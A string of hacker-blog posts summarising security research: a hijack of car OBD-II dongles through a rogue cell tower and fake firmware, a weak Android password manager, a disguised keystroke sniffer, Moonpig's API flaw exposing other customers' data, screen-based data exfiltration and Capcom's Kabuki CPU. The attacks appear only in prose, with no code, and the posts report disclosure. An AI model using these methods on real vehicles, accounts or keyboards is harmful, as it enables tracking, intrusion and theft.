Zubie

Remotely Controlling Automobiles Via Insecure Dongles

Automobiles are getting smarter and smarter. Nowadays many vehicles run on a mostly drive-by-wire system, meaning that a majority of the controls are electronically controlled. We’re not just talking about the window or seat adjustment controls, but also the instrument cluster, steering, brakes, and accelerator. These systems can make the driving experience better, but they also introduce an interesting avenue of attack. If the entire car is controlled by a computer, then what if an attacker were to gain control of that computer? You may think that’s nothing to worry about, because an attacker would have no way to remotely access your vehicle’s computer system. It turns out this isn’t so hard after all. Two recent research projects have shown that some ODBII dongles are very susceptible to attack.

The first was an attack on a device called Zubie. Zubie is a dongle that you can purchase to plug into your vehicle’s ODBII diagnostic port. The device can monitor sensor data from your vehicle and them perform logging and reporting back to your smart phone. It also includes a built-in GPRS modem to connect back to the Zubie cloud. One of the first things the Argus Security research team noticed when dissecting the Zubie was that it included what appeared to be a diagnostic port inside the ODBII connector.

Online documentation showed the researchers that this was a +2.8V UART serial port. They were able to communicate over this port with a computer with minimal effort. Once connected, they were presented with an AT command interface with no authentication. Next, the team decompiled all of the Python pyo files to get the original scripts. After reading through these, they were able to reverse engineer the communication protocols used for communication between the Zubie and the cloud. One particularly interesting finding was that the device was open for firmware updates every time it checked in with the cloud.

The team then setup a rogue cellular tower to perform a man in the middle attack against the Zubie. This allowed them to control the DNS address associated with the Zubie cloud. The Zubie then connected to the team’s own server and downloaded a fake update crafted by the research team. This acted as a trojan horse, which allowed the team to control various aspects of the vehicle remotely via the cellular connection. Functions included tracking the vehicle’s location, unlocking hte doors, and manipulating the instrument cluster. All of this can be done from anywhere in the world as long as the vehicle has a cellular signal.

A separate but similar project was also recently discussed by [Corey Thuen] at the S4x15 security conference. He didn’t attack the Zubie, but it was a similar device. If you are a Progressive insurance customer, you may know that the company offers a device that monitors your driving habits via the ODBII port called SnapShot. In exchange for you providing this data, the company may offer you lower rates. This device also has a cellular modem to upload data back to Progressive.

After some research, [Thuen] found that there were multiple security flaws in Progressive’s tracker. For one, the firmware is neither signed nor validated. On top of that, the system does not authenticate to the cellular network, or even encrypt its Internet traffic. This leaves the system wide open for a man in the middle attack. In fact, [Thuen] mentions that the system can be hacked by using a rogue cellular radio tower, just like the researchers did with the Zubie. [Thuen] didn’t take his research this far, but he likely doesn’t have too in order to prove his point.

The first research team provided their findings to Zubie who have supposedly fixed some of the issues. Progressive has made a statement that they hadn’t heard anything from [Thuen], but they would be happy to listen to his findings. There are far more devices on the market that perform these same functions. These are just two examples that have very similar security flaws. With that in mind, it’s very likely that others have similar issues as well. Hopefully with findings like this made public, these companies will start to take security more seriously before it turns into a big problem.

[Thanks Ellery]

PasswordManagerCode

Tearing Apart An Android Password Manager

With all of the various web applications we use nowadays, it can be daunting to remember all of those passwords. Many people turn to password management software to help with this. Rather than remembering 20 passwords, you can store them all in a (presumably) secure database that’s protected by a single strong password. It’s a good idea in theory, but only if the software is actually secure. [Matteo] was recently poking around an Android password management software and made some disturbing discoveries.

The app claimed to be using DES encryption, but [Matteo] wanted to put this claim to the test. He first decompiled the app to get a look at the code. The developer used some kind of code obfuscation software but it really didn’t help very much. [Matteo] first located the password decryption routine.

He first noticed that the software was using DES in ECB mode, which has known issues and really shouldn’t be used for this type of thing. Second, the software simply uses an eight digit PIN as the encryption key. This only gives up to 100 million possible combinations. It may sound like a lot, but to a computer that’s nothing. The third problem was that if the PIN is less than eight characters, the same digits are always padded to the end to fill in the blanks. Since most people tend to use four digit pins, this can possibly lower the total number of combinations to just ten thousand.

As if that wasn’t bad enough, it actually gets worse. [Matteo] found a function that actually stores the PIN in a plain text file upon generation. When it comes time to decrypt a password, the application will check the PIN you enter with the one stored in the plain-text file. So really, you don’t have to crack the encryption at all. You can simply open the file and reveal the PIN.

[Matteo] doesn’t name the specific app he was testing, but he did say in the Reddit thread that the developer was supposedly pushing out a patch to fix these issues. Regardless, it goes to show that before choosing a password manager you should really do some research and make sure the developer can be trusted, lest your secrets fall into the wrongs hands.

[via Reddit]

Keystroke Sniffer Hides As A Wall Wart, Is Scary

For those of us who worry about the security of our wireless devices, every now and then something comes along that scares even the already-paranoid. The latest is a device from [Samy] that is able to log the keystrokes from Microsoft keyboards by sniffing and decrypting the RF signals used in the keyboard’s wireless protocol. Oh, and the entire device is camouflaged as a USB wall wart-style power adapter.

The device is made possible by an Arduino or Teensy hooked up to an NRF24L01+ 2.4GHz RF chip that does the sniffing. Once the firmware for the Arduino is loaded, the two chips plus a USB charging circuit (for charging USB devices and maintaining the camouflage) are stuffed with a lithium battery into a plastic shell from a larger USB charger. The options for retrieving the sniffed data are either an SPI Serial Flash chip or a GSM module for sending the data automatically via SMS.

The scary thing here isn’t so much that this device exists, but that encryption for Microsoft keyboards was less than stellar and provides little more than a false sense of security. This also serves as a wake-up call that the things we don’t even give a passing glance at might be exactly where a less-honorable person might look to exploit whatever information they can get their hands on. Continue past the break for a video of this device in action, and be sure to check out the project in more detail, including source code and schematics, on [Samy]’s webpage.

Thanks to [Juddy] for the tip!

Continue reading “Keystroke Sniffer Hides As A Wall Wart, Is Scary”

Moonpig

When Responsible Disclosure Isn’t Enough

Moonpig is a well-known greeting card company in the UK. You can use their services to send personalized greeting cards to your friends and family. [Paul] decided to do some digging around and discovered a few security vulnerabilities between the Moonpig Android app and their API.

First of all, [Paul] noticed that the system was using basic authentication. This is not ideal, but the company was at least using SSL encryption to protect the customer credentials. After decoding the authentication header, [Paul] noticed something strange. The username and password being sent with each request were not his own credentials. His customer ID was there, but the actual credentials were wrong.

[Paul] created a new account and found that the credentials were the same. By modifying the customer ID in the HTTP request of his second account, he was able to trick the website into spitting out all of the saved address information of his first account. This meant that there was essentially no authentication at all. Any user could impersonate another user. Pulling address information may not sound like a big deal, but [Paul] claims that every API request was like this. This meant that you could go as far as placing orders under other customer accounts without their consent.

[Paul] used Moonpig’s API help files to locate more interesting methods. One that stood out to him was the GetCreditCardDetails method. [Paul] gave it a shot, and sure enough the system dumped out credit card details including the last four digits of the card, expiration date, and the name associated with the card. It may not be full card numbers but this is still obviously a pretty big problem that would be fixed immediately… right?

[Paul] disclosed the vulnerability responsibly to Moonpig in August 2013. Moonpig responded by saying the problem was due to legacy code and it would be fixed promptly. A year later, [Paul] followed up with Moonpig. He was told it should be resolved before Christmas. On January 5, 2015, the vulnerability was still not resolved. [Paul] decided that enough was enough, and he might as well just publish his findings online to help press the issue. It seems to have worked. Moonpig has since disabled its API and released a statement via Twitter claiming that, “all password and payment information is and has always been safe”. That’s great and all, but it would mean a bit more if the passwords actually mattered.

SingLock

SingLock Protects Your Valuables From Shy People

Two Cornell students have designed their own multi-factor authentication system. This system uses a PIN combined with a form of voice recognition to authenticate a user. Their system is not as simple as speaking a passphrase, though. Instead, you have to sing the correct tones into the lock.

The system runs on an ATMEL MEGA1284P. The chip is not sophisticated enough to be able to easily identify actual human speech. The team decided to focus their effort on detecting pitch instead. The result is a lock that requires you to sing the perfect sequence of pitches. We would be worried about an attacker eavesdropping and attempting to sing the key themselves, but the team has a few mechanisms in place to protect against this attack. First, the system also requires a valid PIN.  An attacker can’t deduce your PIN simply by listening from around the corner. Second, the system also maintains the user’s specific voice signature.

The project page delves much more deeply into the mathematical theory behind how the system works. It’s worth a read if you are a math or audio geek. Check out the video below for a demonstration. Continue reading “SingLock Protects Your Valuables From Shy People”

Downloading Data Through The Display

HIPAA – the US standard for electronic health care documentation – spends a lot of verbiage and bureaucratese on the security of electronic records, making a clear distinction between the use of records by health care worker and the disclosure of records by health care workers. Likewise, the Federal Information Security Management Act of 2002 makes the same distinction; records that should never be disclosed or transmitted should be used on systems that are disconnected from networks.

This distinction between use and disclosure or transmission is of course a farce; if you can display something on a screen, it can be transmitted. [Ian Latter] just gave a talk at Kiwicon that provides the tools to do just that. He calls it ThruGlassXfer (TGXf), and it does exactly what it says on the tin: anything that can be displayed on a screen can be transmitted. All you need are the right tools.

Continue reading “Downloading Data Through The Display”

Reverse Engineering Capcom’s Crypto CPU

There are a few old Capcom arcade titles – Pang, Cadillacs and Dinosaurs, and Block Block – that are unlike anything else ever seen in the world of coin-ops. They’re old, yes, but what makes these titles exceptional is the CPU they run on. The brains in the hardware of these games is a Kabuki, a Z80 CPU that had a few extra security features. why would Capcom produce such a thing? To combat bootleggers that would copy and reproduce arcade games without royalties going to the original publisher. It’s an interesting part of arcade history, but also a problem for curators: this security has killed a number of arcade machines, leading [Eduardo] to reverse engineering and document the Kabuki in full detail.

While the normal Z80 CPU had a pin specifically dedicated to refreshing DRAM, the Kabuki repurposed this pin for the security functions on the chip. With this pin low, the Kabuki was a standard Z80. When the pin was pulled high, it served as a power supply input for the security features. The security – just a few bits saved in memory – was battery backed, and once this battery was disconnected, the chip would fail, killing the game.

Plugging Kabuki into an old Amstrad CPC 6128 without the security pin pulled high allowed [Eduardo] to test all the Z80 instructions, and with that no surprises were found; the Kabuki is fully compatible with every other Z80 on the planet. Determining how Kabuki works with that special security pin pulled high is a more difficult task, but the Mame team has it nailed down.

The security system inside Kabuki works through a series of bitswaps, circular shifts, XORs, each translation different if the byte is an opcode or data. The process of encoding and decoding the security in Kabuki is well understood, but [Eduardo] had a few unanswered questions. What happens after Kabuki lost power and the memory contents – especially the bitswap, address, and XOR keys – vanished? How was the Kabuki programmed in the factory? Is it possible to reprogram these security keys, allowing one Kabuki to play games it wasn’t manufactured for?

[Eduardo] figured being able to encrypt new, valid code was the first step to running code encrypted with different keys. To test this theory, he wrote a simple ‘Hello World’ for the Capcom hardware that worked perfectly under Mame. While the demo worked perfectly under Mame, it didn’t work when burned onto a EPROM and put into real Capcom hardware.

That’s where this story ends, at least for the time being. The new, encrypted code is valid, Mame runs the encrypted code, but until [Eduardo] or someone else can figure out any additional configuration settings inside the Kabuki, this project is dead in the track. [Eduardo] will be back some time next week tearing the Kabuki apart again, trying to unravel the mysteries of what makes this processor work.